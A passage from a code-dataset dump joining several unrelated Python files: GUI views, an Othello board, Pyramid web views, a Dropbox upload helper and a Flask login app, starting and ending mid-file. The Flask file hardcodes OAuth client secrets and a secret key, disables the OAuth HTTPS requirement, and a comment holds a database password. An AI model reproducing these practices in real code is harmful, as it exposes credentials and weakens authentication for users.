self.blogListProvider.refresh()\r\n self.blogListView.refresh()\r\n self.blogListView.deselectAll()\r\n elif selection.getType() == IZViewSelectionTypes.UNPUBLISHED_ACCOUNT_SELECTION:\r\n self.blogListProvider.setAccountId(None)\r\n self.blogListProvider.refresh()\r\n self.blogListView.refresh()\r\n self.blogListView.deselectAll()\r\n\r\n event.Skip()\r\n # end onViewSelection()\r\n\r\n def onBlogSelected(self, event):\r\n blog = self._getSelectedBlog()\r\n if blog is not None:\r\n account = blog.getAccount()\r\n accountId = account.getId()\r\n blogId = blog.getId()\r\n selection = ZViewSelection(IZViewSelectionTypes.BLOG_SELECTION, (accountId, blogId))\r\n fireViewSelectionEvent(selection, self)\r\n else:\r\n fireViewUnselectionEvent()\r\n event.Skip()\r\n # end onBlogSelected()\r\n\r\n def onZoundryRefresh(self, event):\r\n self.blogListView.refresh()\r\n event.Skip()\r\n # end onZoundryRefresh()\r\n\r\n def onAccountChanged(self, account):\r\n if account.getId() == self.blogListProvider.getAccountId():\r\n self.blogListProvider.refresh()\r\n fireRefreshEvent(self)\r\n # end onAccountChanged()\r\n\r\n def onAccountDeleted(self, account):\r\n if account.getId() == self.blogListProvider.getAccountId():\r\n self.blogListProvider.setAccountId(None)\r\n self.blogListProvider.refresh()\r\n fireRefreshEvent(self)\r\n # end onAccountDeleted()\r\n\r\n def 
_registerAsAccountListener(self):\r\n        accountStore = getApplicationModel().getService(IZBlogAppServiceIDs.ACCOUNT_STORE_SERVICE_ID)\r\n        accountStore.addListener(self)\r\n    # end _registerAsAccountListener()\r\n\r\n    def _unregisterAsAccountListener(self):\r\n        accountStore = getApplicationModel().getService(IZBlogAppServiceIDs.ACCOUNT_STORE_SERVICE_ID)\r\n        accountStore.removeListener(self)\r\n    # end _unregisterAsAccountListener()\r\n\r\n    def destroy(self):\r\n        self._unregisterAsAccountListener()\r\n    # end destroy()\r\n\r\n    def _getSelectedBlog(self):\r\n        itemIndexes = self.blogListView.getSelection()\r\n        if itemIndexes:\r\n            itemIndex = itemIndexes[0]\r\n            return self.blogListProvider.getBlogAtIndex(itemIndex)\r\n        return None\r\n    # end _getSelectedBlog()\r\n\r\n# end ZBlogBrowseView\r\n","sub_path":"src/python/zoundry/blogapp/ui/views/browse/blogbrowser.py","file_name":"blogbrowser.py","file_ext":"py","file_size_in_byte":8721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"128144079","text":"import sys\nimport os\nimport pygame\n\n\nclass ModifyFiles(object):\n    def saveFile(self, input, file):\n        fObj = open(os.path.join(\"assets\", file), \"w\")\n        fObj.write(input)\n        fObj.close()\n\n    def openFile(self, file):\n        try:\n            fObj = open(os.path.join(\"assets\", file))\n            s = fObj.read()\n            fObj.close()\n            return s\n        except IOError as message:  # open() raises IOError, not pygame.error\n            print(\"Cannot load file:\", file)\n            raise SystemExit(message)\n\n    def loadImage(self, file, colorkey=None):\n        try:\n            image = pygame.image.load(os.path.join(\"assets\", file))\n        except pygame.error as message:\n            print(\"Cannot load image:\", file)\n            raise SystemExit(message)\n        image = image.convert()\n        if colorkey is not None:\n            if colorkey == -1:\n                colorkey = image.get_at((0, 0))\n            image.set_colorkey(colorkey, pygame.RLEACCEL)\n        return image\n","sub_path":"modifyfiles.py","file_name":"modifyfiles.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"305485951","text":"'''\n    Erich Kramer - April 2017\n    Apache License\n    If using this code please cite creator.\n\n'''\nfrom Board import * \n\n\n\nclass OthelloBoard(Board):\n    def __init__(self, rows, cols, p1, p2):\n        Board.__init__(self, rows, cols)\n        self.p1_symbol = p1\n        self.p2_symbol = p2\n\n\n#PYTHON: this function is a substitute for clone. 
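It deep-copies the grid, so moves played on the copy never touch the original. 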
call as New = Old.cloneOBoard()\n def cloneOBoard(self):\n tmp = OthelloBoard(self.cols, self.rows, self.p1_symbol, self.p2_symbol)\n tmp.grid = copy.deepcopy(self.grid)\n return tmp;\n\n def initialize(self):\n self.set_cell(self.cols //2 -1, self.rows //2 -1, self.p1_symbol)\n self.set_cell(self.cols //2, self.rows //2, self.p1_symbol)\n self.set_cell(self.cols //2 -1, self.rows //2, self.p2_symbol)\n self.set_cell(self.cols //2, self.rows //2 -1, self.p2_symbol)\n\n#PYTHON: Instead of having side effects this function now returns a TUPLE\n def set_coords_in_direction(self, col, row, D):#D=direction\n if(D.name == 'N'):\n row += 1\n elif(D.name == 'NE'):\n col+=1\n row+=1\n elif(D.name == 'E'):\n col+=1\n elif(D.name == 'SE'):\n col+=1\n row-=1\n elif(D.name == 'S'):\n row-=1\n elif(D.name == 'SW'):\n col-=1\n row-=1\n elif(D.name == 'W'):\n col-=1\n elif(D.name == 'NW'):\n col-=1\n row+=1\n else:\n print(\"Invalid Direction.\")\n return (col, row)\n\n#Recursively travel in a direction\n def check_endpoint(self, col, row, symbol, d, match_symbol):#match is bool type\n if not self.is_in_bounds(col, row) or self.is_cell_empty(col,row):\n return False\n else:\n if(match_symbol):\n if(self.get_cell(col, row) == symbol):\n return True\n else:\n (next_col, next_row) = self.set_coords_in_direction(col, row, d)\n return self.check_endpoint(next_col, next_row, symbol, d, match_symbol)\n else:\n if(self.get_cell(col, row) == symbol):\n return False\n else:\n (next_col, next_row) = self.set_coords_in_direction(col, row, d)\n return self.check_endpoint(next_col, next_row, symbol, d, not match_symbol)\n\n def is_legal_move(self, col, row, symbol):\n result = False\n if(not self.is_in_bounds(col, row) or not self.is_cell_empty(col, row)):\n return False\n for d in Direction: #enum from board.py\n (next_col, next_row) = self.set_coords_in_direction(col, row, d)\n if(self.check_endpoint(next_col, next_row, symbol, d, False)):\n return True\n return False\n \n def flip_pieces_helper(self, col, row, symbol, d):\n if(self.get_cell(col, row) == symbol):\n return 0;\n else:\n self.set_cell(col,row, symbol)\n (next_col, next_row) = self.set_coords_in_direction(col, row, d)\n return 1+ self.flip_pieces_helper(next_col, next_row, symbol, d)\n\n\n\n def flip_pieces(self, col, row, symbol):\n pieces_flipped = 0\n if(not self.is_in_bounds(col, row)):\n print(\"Flip Pieces bad params.\")\n exit();\n for d in Direction:\n (next_col, next_row) = self.set_coords_in_direction(col,row,d)\n if(self.check_endpoint(next_col, next_row, symbol, d, False)):\n pieces_flipped += self.flip_pieces_helper(next_col, next_row, symbol, d);\n\n return pieces_flipped\n\n def has_legal_moves_remaining(self, symbol):\n for c in range (0, self.cols):\n for r in range (0, self.rows):\n if self.is_cell_empty(c, r) and self.is_legal_move(c, r, symbol):\n return True\n return False;\n\n def count_score(self, symbol):\n score = 0\n for c in range (0, self.cols):\n for r in range (0, self.rows):\n if self.grid[c][r] == symbol:\n score+=1\n return score\n\n def play_move(self, col, row, symbol):\n self.set_cell(col, row, symbol)\n self.flip_pieces(col, row, symbol)\n\n\n\n\n","sub_path":"CS331-Assignment2/OthelloBoard.py","file_name":"OthelloBoard.py","file_ext":"py","file_size_in_byte":4306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"308510190","text":"# -*- coding: utf-8 -*--\nfrom pyramid.view import view_config\nimport pyramid.httpexceptions as exc\n\nfrom 
infolica.exceptions.custom_error import CustomError\nfrom infolica.models import Constant\nfrom infolica.models.models import ControleMutation, Operateur\nfrom infolica.scripts.utils import Utils\nfrom infolica.scripts.authentication import check_connected\n\n@view_config(route_name='controles_mutations', request_method='GET', renderer='json')\n@view_config(route_name='controles_mutations_s', request_method='GET', renderer='json')\ndef controles_mutations_view(request):\n \"\"\"\n Return all controles_mutations\n \"\"\"\n # Check connected\n if not check_connected(request):\n raise exc.HTTPForbidden()\n\n query = request.dbsession.query(ControleMutation).all()\n return Utils.serialize_many(query)\n\n\n@view_config(route_name='controle_mutation_by_id', request_method='GET', renderer='json')\ndef controles_mutations_by_id_view(request):\n \"\"\"\n Return controle_mutation by id\n \"\"\"\n # Check connected\n if not check_connected(request):\n raise exc.HTTPForbidden()\n\n # Get controle mutation id\n id = request.id = request.matchdict['id']\n query = request.dbsession.query(ControleMutation).filter(\n ControleMutation.id == id).first()\n return Utils.serialize_one(query)\n\n\n@view_config(route_name='controle_mutation_by_affaire_id', request_method='GET', renderer='json')\ndef controles_mutations_by_affaire_id_view(request):\n \"\"\"\n Return controle_mutation by affaire_id\n \"\"\"\n # Check connected\n if not check_connected(request):\n raise exc.HTTPForbidden()\n\n # Get controle mutation id\n affaire_id = request.id = request.matchdict['id']\n query = request.dbsession.query(ControleMutation).filter(\n ControleMutation.affaire_id == affaire_id).first()\n\n if query is None:\n return None\n\n ctrl = Utils.serialize_one(query)\n\n # get operateur\n operateur_id = ctrl['visa']\n\n if operateur_id is not None:\n operateur = request.dbsession.query(\n Operateur\n ).filter(\n Operateur.id == operateur_id\n ).first()\n\n ctrl['operateur_prenom_nom'] = ' '.join([operateur.prenom, operateur.nom])\n else:\n ctrl['operateur_prenom_nom'] = None\n\n return ctrl\n\n\n@view_config(route_name='controles_mutations', request_method='POST', renderer='json')\n@view_config(route_name='controles_mutations_s', request_method='POST', renderer='json')\ndef controles_mutations_new_view(request):\n \"\"\"\n Add new controle_mutation\n \"\"\"\n # Check authorization\n if not Utils.has_permission(request, request.registry.settings['affaire_edition']):\n raise exc.HTTPForbidden()\n\n Utils.addNewRecord(request, ControleMutation)\n\n return Utils.get_data_save_response(Constant.SUCCESS_SAVE.format(ControleMutation.__tablename__))\n\n\n@view_config(route_name='controles_mutations', request_method='PUT', renderer='json')\n@view_config(route_name='controles_mutations_s', request_method='PUT', renderer='json')\ndef controles_mutations_update_view(request):\n \"\"\"\n Update controle_mutation\n \"\"\"\n # Check authorization\n if not Utils.has_permission(request, request.registry.settings['affaire_edition']):\n raise exc.HTTPForbidden()\n\n # Get controle mutation id\n id = request.params['id'] if 'id' in request.params else None\n\n # Get controle mutation record\n record = request.dbsession.query(ControleMutation).filter(\n ControleMutation.id == id).first()\n\n if not record:\n raise CustomError(\n CustomError.RECORD_WITH_ID_NOT_FOUND.format(ControleMutation.__tablename__, id))\n\n record = Utils.set_model_record(record, request.params)\n\n return 
Utils.get_data_save_response(Constant.SUCCESS_SAVE.format(ControleMutation.__tablename__))\n\n\n@view_config(route_name='controles_mutations', request_method='DELETE', renderer='json')\n@view_config(route_name='controles_mutations_s', request_method='DELETE', renderer='json')\ndef controles_mutations_delete_view(request):\n    \"\"\"\n    Delete controle_mutation\n    \"\"\"\n    # Check authorization\n    if not Utils.has_permission(request, request.registry.settings['affaire_edition']):\n        raise exc.HTTPForbidden()\n\n    # Get controle mutation id\n    id = request.params['id'] if 'id' in request.params else None\n\n    # Get controle mutation record\n    record = request.dbsession.query(ControleMutation).filter(\n        ControleMutation.id == id).first()\n\n    if not record:\n        raise CustomError(\n            CustomError.RECORD_WITH_ID_NOT_FOUND.format(ControleMutation.__tablename__, id))\n\n    request.dbsession.delete(record)\n\n    return Utils.get_data_save_response(Constant.SUCCESS_DELETE.format(ControleMutation.__tablename__))\n\n\n@view_config(route_name='controle_mutation_geos', request_method='GET', renderer='json')\ndef controle_mutation_geos_view(request):\n    \"\"\"\n    Trigger controle_mutation_geos\n    \"\"\"\n    # Check authorization\n    if not Utils.has_permission(request, request.registry.settings['affaire_edition']):\n        raise exc.HTTPForbidden()\n\n    # Get controle mutation id\n    affaire_id = request.params['affaire_id'] if 'affaire_id' in request.params else None\n\n    operateur = Utils.getOperateurFromUser(request)\n\n    url = request.registry.settings['infolica_cron_url_trigger'] + 'controle_mutation_geos?' \\\n        'variables=mutation={}|initiale={}|mail={}'.format(affaire_id, operateur.initiales, operateur.mail)\n    \n    return {'url': url}\n","sub_path":"back/infolica/views/controle_mutation.py","file_name":"controle_mutation.py","file_ext":"py","file_size_in_byte":5522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"446280470","text":"import os\nimport pickle\nimport openpyxl as xl\n\n\nwith open('players', 'rb') as fichier:\n    mon_depickler = pickle.Unpickler(fichier)\n    players = mon_depickler.load()\n\nwith open('matchs', 'rb') as fichier:\n    mon_depickler = pickle.Unpickler(fichier)\n    matchs = mon_depickler.load()\n\n# print(players)\n\n\nresults = {}\nfor elt in players:\n    results[elt] = 0\n\n# for i, j in results.items():\n#     print(f\"{i} = {j} pts\")\n\nfor elt in matchs:\n    print(f\"{elt} : who won the match ? \")\n    okay = False\n    while not okay:\n        winner = input(\":->\").title()\n        if winner not in players:\n            print(\"Unknown player\")\n            continue\n        elif winner in players:\n            points = results.get(winner)\n            results[winner] = points + 3\n            okay = True\n\nwb = xl.load_workbook(\"poolresults.xlsx\")\nsheet = wb[\"Feuil1\"]\n\nrow = 3\n\nfor i, j in results.items():\n    cell_name = sheet.cell(row, 3)\n    cell_marks = sheet.cell(row, 4)\n    cell_name.value = i\n    cell_marks.value = j\n    row += 1\n\nwb.save(\"poolresults.xlsx\")\n\nos.system(\"pause\")\n","sub_path":"pool_ranking.py","file_name":"pool_ranking.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"}
+{"seq_id":"21627377","text":"'''\nNOTE: This only works for test and val because they are small. 
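All captions are tokenized and encoded as one giant batch, so memory use grows with caption count; for a large split the single encode_text call could be chunked instead, e.g. torch.cat([model.encode_text(c) for c in text_inputs.split(512)]) (a sketch; the chunk size 512 is arbitrary). 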
This does NOT work on train.\nUse the scripts process_texts_to_tokens.py followed by process_tokens_to_encodings.py \nfor the same effect.\n\nPre-processing Step 1:\nInput: JSON file\nOutput: Pytorch (.pt) file\nGenerates a pytorch file containing a list of the text caption CLIP encodings.\nThis is generated as a preprocessing step because it is more efficient for \nthe CLIP model to encode in large batches rather than 1 string at a time.\n\n\n'''\nimport json\nimport os.path\nfrom os import path\nimport clip\nimport torch\n\nJSON_FILE = '/home/ubuntu/vist/sis/train.story-in-sequence.json'\nENCODINGS_FILE = 'train_text_encodings_0.pt' # a list of the text encodings in the same order as they appear in the file\n\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nprint(\"Device: %s\" % device)\n\n# Load the json annotation file\nprint(\"Loading json file...\")\nwith open(JSON_FILE) as f:\n data = json.load(f)\n\nannotations = data['annotations']\nraw_texts = []\nfor annot in annotations:\n # Extract relevant fields\n annot_dict = annot[0]\n raw_texts.append(annot_dict['text'])\n\n\n# Load the CLIP text encoder model\ndevice = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nprint(\"Device: %s\" % device)\nprint(\"Loading CLIP model...\")\nmodel, preprocess = clip.load('ViT-B/32', device)\n\nprint(\"Clearing json object...\")\ndata.clear()\n\nprint(\"Clearing cuda cache...\")\ntorch.cuda.empty_cache()\n\n# Prepare the inputs\nprint(\"Tokenizing raw texts...\")\ntext_inputs = torch.cat([clip.tokenize(text) for text in raw_texts]).to(device)\n\n# Calculate features\nprint(\"Encoding tokenized texts...\")\nwith torch.no_grad():\n text_features = model.encode_text(text_inputs)\n\nprint(text_features.size())\n\nprint(\"Saving to torch file %s\" % ENCODINGS_FILE)\ntorch.save( text_features, open( ENCODINGS_FILE, \"wb\" ) )\n \n","sub_path":"vist_dataset/process_texts_to_encodings.py","file_name":"process_texts_to_encodings.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"526014972","text":"from .types import ActFailedError\n\nclass BasicAct:\n\t\"\"\"Wrapper for basic acts.\n\tBasic act locally accessed act.\n\t\"\"\"\n\n\tdef __init__(self, obj):\n\t\tself.obj = obj\n\n\tdef call(self, data):\n\t\tif not self.obj.setData(data):\n\t\t\traise ValueError(\"Invalid input: %s\" % data)\n\n\t\tif not self.obj.execute():\n\t\t\traise ActFailedError(\"Act %s failed\" % self.__class__.__name__)\n\n\t\treturn self.obj.getData()\n","sub_path":"system/core/acts/basicact.py","file_name":"basicact.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"609185844","text":"import os \nimport tqdm\nimport shutil\nfrom . import haven_utils as hu \nfrom . 
import haven_jupyter as hj\n\n\ndef to_dropbox(exp_list, savedir_base, dropbox_path, access_token, zipname):\n \"\"\"[summary]\n \n Parameters\n ----------\n exp_list : [type]\n [description]\n savedir_base : [type]\n [description]\n dropbox_path : [type]\n [description]\n access_token : [type]\n [description]\n \"\"\"\n # zip files \n exp_id_list = [hu.hash_dict(exp_dict) for exp_dict in exp_list]\n src_fname = os.path.join(savedir_base, zipname)\n out_fname = os.path.join(dropbox_path, zipname)\n zipdir(exp_id_list, savedir_base, src_fname)\n\n upload_file_to_dropbox(src_fname, out_fname, access_token)\n print('saved: https://www.dropbox.com/home/%s' % out_fname)\n\n \ndef upload_file_to_dropbox(src_fname, out_fname, access_token):\n import dropbox\n dbx = dropbox.Dropbox(access_token)\n try:\n dbx.files_delete_v2(out_fname)\n except:\n pass\n # with open(src_fname, 'rb') as f:\n # dbx.files_upload(f.read(), out_fname)\n\n upload(access_token=access_token,\n file_path=src_fname,\n target_path=out_fname)\n\n\ndef upload(\n access_token,\n file_path,\n target_path,\n timeout=900,\n chunk_size=4 * 1024 * 1024,\n):\n import os\n import dropbox\n import tqdm\n dbx = dropbox.Dropbox(access_token, timeout=timeout)\n with open(file_path, \"rb\") as f:\n file_size = os.path.getsize(file_path)\n chunk_size = 4 * 1024 * 1024\n if file_size <= chunk_size:\n print(dbx.files_upload(f.read(), target_path))\n else:\n with tqdm.tqdm(total=file_size, desc=\"Uploaded\") as pbar:\n upload_session_start_result = dbx.files_upload_session_start(\n f.read(chunk_size)\n )\n pbar.update(chunk_size)\n cursor = dropbox.files.UploadSessionCursor(\n session_id=upload_session_start_result.session_id,\n offset=f.tell(),\n )\n commit = dropbox.files.CommitInfo(path=target_path)\n while f.tell() < file_size:\n if (file_size - f.tell()) <= chunk_size:\n print(\n dbx.files_upload_session_finish(\n f.read(chunk_size), cursor, commit\n )\n )\n else:\n dbx.files_upload_session_append(\n f.read(chunk_size),\n cursor.session_id,\n cursor.offset,\n )\n cursor.offset = f.tell()\n pbar.update(chunk_size)\n print('uploaded!')\n\n\ndef zipdir(exp_id_list, savedir_base, src_fname, add_jupyter=True, verbose=1, \n fname_list=None, dropbox_path='/shared', access_token=None):\n import zipfile\n zipf = zipfile.ZipFile(src_fname, 'w', zipfile.ZIP_DEFLATED)\n\n # ziph is zipfile handle\n if add_jupyter:\n abs_path = os.path.join(savedir_base, 'results.ipynb')\n hj.create_jupyter(fname=abs_path, \n savedir_base='results/', overwrite=False, print_url=False,\n create_notebook=True)\n \n rel_path = 'results.ipynb'\n zipf.write(abs_path, rel_path)\n os.remove(abs_path)\n\n n_zipped = 0\n if verbose:\n tqdm_bar = tqdm.tqdm\n else:\n tqdm_bar = lambda x: x\n \n fname_all = ['score_list.pkl', \"exp_dict.json\"] \n if isinstance(fname_list, list):\n fname_all += fname_list\n\n for exp_id in tqdm_bar(exp_id_list):\n if not os.path.isdir(os.path.join(savedir_base, exp_id)):\n continue\n \n for fname in fname_all:\n abs_path = os.path.join(savedir_base, exp_id, fname)\n rel_path = os.path.join( \"results\", exp_id, fname)\n if os.path.exists(abs_path):\n zipf.write(abs_path, rel_path)\n\n n_zipped += 1\n\n zipf.close()\n if verbose:\n print('Zipped: %d/%d exps in %s' % (n_zipped, len(exp_id_list), src_fname))\n\n if access_token is not None and access_token != '':\n out_fname = os.path.join(dropbox_path, src_fname)\n upload_file_to_dropbox(src_fname, out_fname, access_token)\n print('saved: https://www.dropbox.com/home/%s' % 
out_fname)","sub_path":"haven/haven_share/haven_dropbox.py","file_name":"haven_dropbox.py","file_ext":"py","file_size_in_byte":4469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"175094550","text":"# modified binary search to return multiple contiguos hits\ndef binarySearch(alist, item):\n if len(alist) == 0:\n return False\n else:\n midpoint = len(alist)//2\n if alist[midpoint].startswith(item):\n results = {alist[midpoint]}\n for x in alist[midpoint:]:\n if x.startswith(item):\n results.add(x)\n else:\n break\n return results\n else:\n if item<alist[midpoint][:3]:\n return binarySearch(alist[:midpoint],item)\n else:\n return binarySearch(alist[midpoint+1:],item)\n \n\ndef create_suffix_array(s):\n suffix_array = [s[i:]+\"#\"+str(i) for i in range(len(s))]\n suffix_array.sort(key=None, reverse=False)\n return suffix_array\n\ndef create_grams(sequence, gram_length):\n grams = [sequence[i:i+gram_length]\n for i in range(len(sequence)+1-gram_length)]\n return grams\n\ndef find_grams_in_sequence(suffix_array, grams_array):\n pairs = list()\n \n for idy,y in enumerate(grams_array):\n results = binarySearch(suffix_array, y)\n pairs.extend([(int(x[x.index(\"#\")+1:]),idy)\n for x in results ])\n \n pairs.sort(key=None, reverse=False)\n\n return pairs\n \ndef find_identical_pairs(suffix_array, grams_array, gram_length,\n sequence):\n pairs = find_grams_in_sequence(suffix_array, grams_array)\n \n # create a list for results\n substring_indexes_list = list()\n \n \n \n # start with the first pair, since there can't be any matchings \n # before it\n current_suffix_index = pairs[0][0]\n current_gram = pairs[0][1]\n \n # a list of lists to save the begining and end of each \n # substring\n substring_indexes = [\n [current_suffix_index,current_suffix_index+gram_length-1], \n [current_gram,current_gram+gram_length-1]]\n \n # try and extend the matching by iterating over the rest of \n # pairs, and extending if the next pair directly follows the \n # previous\n for x in pairs[1:]:\n \n # if the next pair doesn't lead to an extension, then we \n # have found a maximal segment pair. 
Add that to the list \n # and start a new one\n if ( x[0] != current_suffix_index+1\n or x[1] != current_gram +1):\n \n substring_indexes_list.append(substring_indexes)\n \n current_suffix_index = x[0]\n current_gram = x[1]\n \n substring_indexes = \\\n [[current_suffix_index,current_suffix_index\n +gram_length-1]\n , [current_gram,current_gram+gram_length-1]]\n continue\n \n # update the current indexes\n current_gram = x[1]\n current_suffix_index = x[0]\n \n # extend the segment pair by incrementing the end index\n substring_indexes[0][1] = substring_indexes[0][1]+1\n substring_indexes[1][1] = substring_indexes[1][1]+1\n \n substring_indexes_list.append(substring_indexes)\n \n return substring_indexes_list\n\ndef mark_substrings(pair, sequence, query):\n marked_sequence = sequence[:pair[0][0]]+\"(\" \\\n +sequence[pair[0][0]:pair[0][1]+1] \\\n +\")\"+sequence[pair[0][1]+1:]\n marked_query = query[:pair[1][0]]+\"(\" \\\n +query[pair[1][0]:pair[1][1]+1] \\\n +\")\"+query[pair[1][1]+1:]\n return \"\\n\".join([marked_sequence,marked_query])\n\n\n\n\n\nif(__name__ == \"__main__\"):\n s = \"CGATCGCCATGGCTAACGTT\"\n q = \"CATGGCCA\"\n gram_length = 3\n \n suffix_array = create_suffix_array(s);\n grams_array = create_grams(q, gram_length)\n \n pairs = \\\n find_identical_pairs(suffix_array, grams_array, gram_length, s)\n \n print(\"the matching substrings are marked with parentheses\\n\")\n for pair in pairs:\n print(mark_substrings(pair,s,q)+\"\\n\")\n","sub_path":"bio1/sheet9/programs/exercise3.py","file_name":"exercise3.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"28994830","text":"\"\"\"\r\nGeneral script settings.\r\nFor changing system or parameter defaults, use \"biology.default_values.py\" file\r\n\"\"\"\r\n\r\n# User defined values\r\nOUTPUT_FOLDER = \"output\"\r\nNAME_OF_SCRIPT_LOG_FILE = \"script.log\" # Name of script Log file\r\nNAME_OF_OUTPUT_FILE = \"output.log\" # Name of output file\r\n# True if you want to store script log in external file. (Recommended : True)\r\nSTORE_SCRIPT_LOG = True\r\nPRINT_TO_CONSOLE = True # True if script log should be shown on console\r\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"87499887","text":"'''\nUsing names.txt (right click and 'Save Link/Target As...'), a 46K text file containing over five-thousand first names, begin by sorting it into alphabetical order. Then working out the alphabetical value for each name, multiply this value by its alphabetical position in the list to obtain a name score.\n\nFor example, when the list is sorted into alphabetical order, COLIN, which is worth 3 + 15 + 12 + 9 + 14 = 53, is the 938th name in the list. 
So, COLIN would obtain a score of 938 × 53 = 49714.\n\nWhat is the total of all the name scores in the file?\n'''\n\nimport numpy as np\n\ndef length_of_names(name):\n num = [ord(name[alphabet]) - 64 for alphabet in range(0, len(name))]\n return sum(num)\n\ndef read_data(filename):\n with open(filename, \"r\") as file:\n names = file.read()\n names = names.replace('\"','').split(',')\n names.sort()\n return names\n\n\nnames = read_data(\"names.txt\")\nalphabet_values = [length_of_names(name) for name in names]\n\nname_scores = np.dot(alphabet_values, list(range(1, len(names)+1)))\nprint(\"Name scores =\", name_scores)\n","sub_path":"andrew/euler/euler_22.py","file_name":"euler_22.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"648013729","text":"import re\nimport os\nimport numpy as np\nfrom PIL import Image\nfrom StringIO import StringIO\n\nimport words\nfrom words import VOCABULARY_SIZE\n\n\nIMG_SHAPE = (224,224)\nMAX_WORDS = 10\n\n\ndef onehot(index):\n res = np.zeros(VOCABULARY_SIZE)\n res[index] = 1.0\n return res\n\n\ndef expand(x):\n return np.expand_dims(x, axis=0)\n\n\n# Swiss army knife for image decoding\ndef decode_jpg(jpg, box=None, crop_to_box=None, preprocess=True):\n if jpg.startswith('\\xFF\\xD8'):\n # jpg is a JPG buffer\n img = Image.open(StringIO(jpg))\n else:\n # jpg is a filename\n img = Image.open(jpg)\n img = img.convert('RGB')\n width = img.width\n height = img.height\n if crop_to_box:\n # Crop to bounding box\n x0, x1, y0, y1 = crop_to_box\n img = img.crop((x0,y0,x1,y1))\n if preprocess:\n img = img.resize(IMG_SHAPE)\n pixels = np.array(img).astype(float)\n if preprocess:\n pixels = imagenet_process(pixels)\n if box:\n # Transform a bounding box after resizing\n x0, x1, y0, y1 = box\n xs = float(pixels.shape[1]) / width\n ys = float(pixels.shape[0]) / height\n x0 *= xs\n x1 *= xs\n y0 *= ys\n y1 *= ys\n return pixels, (x0, x1, y0, y1)\n return pixels\n\n\ndef encode_jpg(pixels):\n img = Image.fromarray(pixels.astype(np.uint8)).convert('RGB')\n fp = StringIO()\n img.save(fp, format='JPEG')\n return fp.getvalue()\n\n\ndef imagenet_process(x):\n x[:, :, 0] -= 103.939\n x[:, :, 1] -= 116.779\n x[:, :, 2] -= 123.68\n # 'RGB'->'BGR'\n return x[:, :, ::-1]\n\n\ndef left_pad(indices):\n res = np.zeros(MAX_WORDS, dtype=int)\n res[MAX_WORDS - len(indices):] = indices\n return res\n\n\n\ndef show(jpg, box=None):\n if type(jpg) == type(np.array([])):\n pixels = jpg\n else:\n pixels = decode_jpg(jpg, preprocess=False)\n if box:\n draw_box(pixels, box)\n with open('/tmp/example.jpg', 'w') as fp:\n fp.write(encode_jpg(pixels))\n os.system('imgcat /tmp/example.jpg')\n\n\ndef draw_box(img, box, color=1.0):\n x0, x1, y0, y1 = (int(val) for val in box)\n height, width, channels = img.shape\n x0 = np.clip(x0, 0, width-1)\n x1 = np.clip(x1, 0, width-1)\n y0 = np.clip(y0, 0, height-1)\n y1 = np.clip(y1, 0, height-1)\n img[y0:y1,x0] = color\n img[y0:y1,x1] = color\n img[y0,x0:x1] = color\n img[y1,x0:x1] = color\n\n\ndef strip(text):\n # Remove the START_TOKEN\n text = text.replace('000', '')\n # Remove all text after the first END_TOKEN\n end_idx = text.find('001')\n if end_idx >= 0:\n text = text[:end_idx]\n # Remove non-alphanumeric characters and lowercase everything\n return re.sub(r'\\W+', ' ', 
text.lower()).strip()\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"516258220","text":"from flask import Flask, render_template, request, flash, logging, url_for, redirect, jsonify, make_response, session, g\nfrom flask_sqlalchemy import SQLAlchemy\nimport requests\nimport json\nimport logging\nimport xml.etree.ElementTree as ET\nfrom flask_dance.contrib.twitter import make_twitter_blueprint, twitter\nfrom flask_dance.contrib.github import make_github_blueprint, github \nimport os \nfrom CloudFlask import app, db\n\n# app = Flask(__name__)\n\n# app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:sneha3010@localhost/projectdb'\napp.config['SECRET_KEY'] = 'thisisasecretkey'\n\n# Source: https://stackoverflow.com/questions/27785375/testing-flask-oauthlib-locally-without-https\n# for github HTTPS\nos.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\n\ntwitter_blueprint = make_twitter_blueprint(api_key='snajatcEGgC19dwf9AFNQMtM8 ', api_secret='ieX5hO4amP6ay6bkPCyY1Bfla9BtWMla7NWRN9nyzu4tDdVKR4')\ngithub_blueprint = make_github_blueprint(client_id='b1198cf45b0983ee621f', client_secret='80ad32fdf60fc3350e398da866e77891075d15b4')\n\napp.register_blueprint(twitter_blueprint, url_prefix = '/twitter_login')\napp.register_blueprint(github_blueprint, url_prefix = '/github_login')\n\n# db = SQLAlchemy(app)\n\n# employee_id = '1'\n\nclass Employee_details(db.Model):\n\t__tablename__ = 'emp_employee1'\n\tusername = db.Column('username', db.Unicode, primary_key=True)\n\tpassword = db.Column('password', db.Unicode)\n\temp_name = db.Column('emp_name', db.Unicode)\n\tsalary = db.Column('salary', db.Integer)\n\temp_start_date = db.Column('emp_start_date', db.DateTime)\n\nwith app.app_context():\n db.create_all()\nflag = False\n\n@app.route('/')\ndef home(): \n# if github.authorized:\n\tprint(\"A\")\n\taccount_info = 